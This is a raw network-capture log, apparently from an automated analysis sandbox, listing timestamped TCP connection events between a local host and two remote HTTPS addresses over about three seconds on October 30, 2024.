                                                Oct 30, 2024 00:23:31.153161049 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.153244019 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.153244019 CET58306443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.153290033 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.153318882 CET4435830613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.155953884 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.155992985 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.156084061 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.156250000 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.156265974 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.232515097 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.233155012 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.233175039 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.233757973 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.233769894 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.257669926 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.258387089 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.258419991 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.258940935 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.258954048 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.362732887 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.362817049 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.362886906 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.363056898 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.363084078 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.363107920 CET58307443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.363121986 CET4435830713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.366045952 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.366080999 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.366158009 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.366322994 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.366342068 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.388731956 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.388748884 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.388844967 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.388849020 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.388906956 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.389149904 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.389184952 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.389219046 CET58308443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.389233112 CET4435830813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.392180920 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.392208099 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.392290115 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.392460108 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.392472029 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.522697926 CET44358251142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:23:31.522749901 CET44358251142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:23:31.522929907 CET58251443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:23:31.545258045 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.545986891 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.546011925 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.546576977 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.546582937 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.677339077 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.677361012 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.677422047 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.677563906 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.677807093 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.677834034 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.677860022 CET58309443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.677875042 CET4435830913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.681200027 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.681225061 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.681298971 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.681451082 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.681459904 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.879523993 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.880259037 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.880274057 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.880882025 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.880887985 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.895755053 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.896357059 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.896379948 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:31.896908998 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:31.896922112 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.011267900 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.011285067 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.011333942 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.011416912 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.011723042 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.011735916 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.011750937 CET58310443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.011756897 CET4435831013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.015507936 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.015535116 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.015621901 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.015850067 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.015861988 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.029814959 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.029834986 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.029915094 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.029917002 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.029967070 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.030170918 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.030189991 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.030224085 CET58311443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.030235052 CET4435831113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.032951117 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.033041000 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.033143997 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.033308029 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.033343077 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.125231028 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.125797033 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.125807047 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.126440048 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.126445055 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.141716003 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.142061949 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.142077923 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.142525911 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.142533064 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.261394024 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.261432886 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.261599064 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.261821032 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.261828899 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.261837006 CET58313443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.261841059 CET4435831313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.265100956 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.265130997 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.265213966 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.265371084 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.265381098 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.275688887 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.275758982 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.275815010 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.275919914 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.275934935 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.275948048 CET58312443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.275955915 CET4435831213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.278271914 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.278357983 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.278448105 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.278585911 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.278625965 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.432893991 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.433410883 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.433424950 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.434048891 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.434055090 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.566528082 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.566597939 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.566653967 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.566860914 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.566876888 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.566889048 CET58314443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.566895962 CET4435831413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.570219040 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.570234060 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.570341110 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.570544004 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.570555925 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.603648901 CET58251443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:23:32.603704929 CET44358251142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:23:32.757239103 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.757818937 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.757843018 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.758476019 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.758480072 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.776515961 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.776860952 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.776911020 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.777350903 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.777369976 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.888736963 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.888844013 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.888900042 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.889030933 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.889043093 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.889051914 CET58315443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.889058113 CET4435831513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.892487049 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.892502069 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.892585993 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.892726898 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.892738104 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.910567999 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.910587072 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.910640001 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.910672903 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.910723925 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.910867929 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.910907030 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.910938978 CET58316443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.910953045 CET4435831613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.913621902 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.913655043 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:32.913718939 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.913857937 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:32.913872957 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.021120071 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.021716118 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.021742105 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.023015976 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.023020983 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.051153898 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.051692963 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.051748037 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.052925110 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.052941084 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.157588005 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.157613039 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.157648087 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.157701015 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.157725096 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.158014059 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.158024073 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.158031940 CET58317443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.158037901 CET4435831713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.162693024 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.162715912 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.162803888 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.162962914 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.162977934 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.304610968 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.305319071 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.305329084 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.306654930 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.306659937 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313177109 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313210011 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313235998 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313312054 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.313313007 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.313380957 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313448906 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.313889027 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313947916 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.313973904 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.314002037 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.314039946 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.314073086 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.314099073 CET58318443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.314112902 CET4435831813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.317471981 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.317506075 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.317574024 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.317691088 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.317708015 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.434519053 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.434546947 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.434623957 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.434643984 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.434665918 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.435157061 CET58319443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.435164928 CET4435831913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.441006899 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.441020012 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.441101074 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.441242933 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.441251040 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.623445034 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.624160051 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.624183893 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.625556946 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.625560999 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.668118954 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.668623924 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.668637991 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.669857979 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.669862986 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.803060055 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.803088903 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.803145885 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.803152084 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.803204060 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.803427935 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.803447962 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.803459883 CET58321443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.803467035 CET4435832113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.807647943 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.807738066 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.807854891 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.808175087 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.808212042 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.864880085 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.864901066 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.864926100 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.864976883 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.864996910 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.865019083 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.865047932 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.871212006 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.871248960 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.871258974 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.871283054 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.871330976 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.871392012 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.871402025 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.871409893 CET58320443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.871413946 CET4435832013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.875305891 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.875334978 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.875423908 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.875565052 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.875575066 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.892144918 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.892694950 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.892709017 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:33.894330978 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:33.894335032 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023178101 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023192883 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023286104 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.023294926 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023329973 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023372889 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.023593903 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.023598909 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.023607016 CET58322443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.023611069 CET4435832213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.028450012 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.028538942 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.028633118 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.028791904 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.028830051 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.049657106 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.050194979 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.050205946 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.051532030 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.051537991 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.166034937 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.166681051 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.166702986 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.168020010 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.168026924 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.182389975 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.182647943 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.182707071 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.182929039 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.182943106 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.182981968 CET58323443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.182988882 CET4435832313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.188162088 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.188227892 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.188330889 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.188468933 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.188500881 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.298275948 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.298476934 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.298543930 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.298577070 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.298593044 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.298603058 CET58324443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.298608065 CET4435832413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.300903082 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.300997019 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.301089048 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.301225901 CET58329443192.168.2.413.107.246.60
